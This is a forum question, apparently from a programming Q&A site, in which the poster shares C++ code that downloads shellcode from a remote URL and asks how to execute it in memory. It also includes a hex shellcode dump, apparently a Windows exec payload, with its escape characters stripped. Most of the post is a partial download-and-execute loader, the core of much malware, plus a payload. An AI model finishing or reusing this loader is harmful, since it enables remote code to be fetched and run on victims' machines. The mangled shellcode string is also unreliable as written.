How to execute shellcode with this C++ program?

  Kiến thức lập trình

I’ve managed to create a program to download shellcode using HTTP, but I can’t figure out how to run the shellcode.

#include "pch.h"
#include "explorer.h"
#include "getpaths.h"
#include "shortcut.h"

#include <iostream>
#include <windows.h>
#include <wininet.h>
#include <vector>
#include <iomanip>

#pragma comment(lib, "wininet.lib")

using namespace std;

int main() {
    HINTERNET hInternet = InternetOpen(L"WinINet", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (!hInternet) {
        cerr << "Failed to initialize WinINet." << endl;
        return 1;
    }

    HINTERNET hUrl = InternetOpenUrl(hInternet, L"https://website.com/shellcode.txt", NULL, 0, INTERNET_FLAG_RELOAD, 0);
    if (!hUrl) {
        cerr << "Failed to open URL." << endl;
        InternetCloseHandle(hInternet);
        return 1;
    }

    vector<unsigned char> shellcode;
    char buffer[1024];
    DWORD bytesRead;
    while (InternetReadFile(hUrl, buffer, sizeof(buffer), &bytesRead) && bytesRead != 0) {
        // Append the read data to the shellcode vector
        for (DWORD i = 0; i < bytesRead; ++i) {
            shellcode.push_back(buffer[i]);
        }
    }

    InternetCloseHandle(hUrl);
    InternetCloseHandle(hInternet);

    // Print out the shellcode
    cout << "Shellcode:" << endl;
    for (size_t i = 0; i < shellcode.size(); ++i) {
        cout << shellcode[i];
    }
    cout << endl;

    return 0;
}

The shellcode is downloaded as follows, in hexadecimal format:
xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xebx8dx5dx6ax01x8dx85xb2x00x00x00x50x68x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5x65x78x70x6cx6fx72x65x72x2ex65x78x65x00

I’ve tried several of the “conventional methods” but there’s always a problem with the conversion of unsigned chars, problems that don’t occur with hard-coded shellcode as variables.

LEAVE A COMMENT